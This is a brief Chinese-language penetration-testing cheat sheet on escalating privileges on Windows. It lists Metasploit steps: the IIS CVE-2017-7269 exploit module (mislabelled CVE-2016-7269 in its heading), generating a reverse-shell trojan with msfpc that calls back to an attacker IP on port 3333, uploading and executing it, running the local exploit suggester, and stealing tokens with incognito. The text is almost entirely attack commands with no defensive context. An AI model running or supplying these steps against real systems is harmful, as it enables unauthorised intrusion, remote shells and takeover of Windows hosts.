# Windows 内核提权
Cve-2016-7269 低权限提权
第一种方法
利用模块进行渗透
1 | use exploit/windows/iis/cve-2017-7269 |
发现是 windows 低权限,限免进行提权
# 生成 exe 上传反弹木马
生成反弹木马
1 | msfpc windows 本地IP 3333 |
上传 1.exe 到 C:/1 / 下,进行反弹
1 | execute -f 1.exe |
1 | 利用run post/multi/recon/local_exploit_suggester 查看可利用模块 |
获得 windows 高权限
# 扩展方法
# 令牌提权
低权限令牌提权
1 | use incognito # 加载窃取令牌模块 |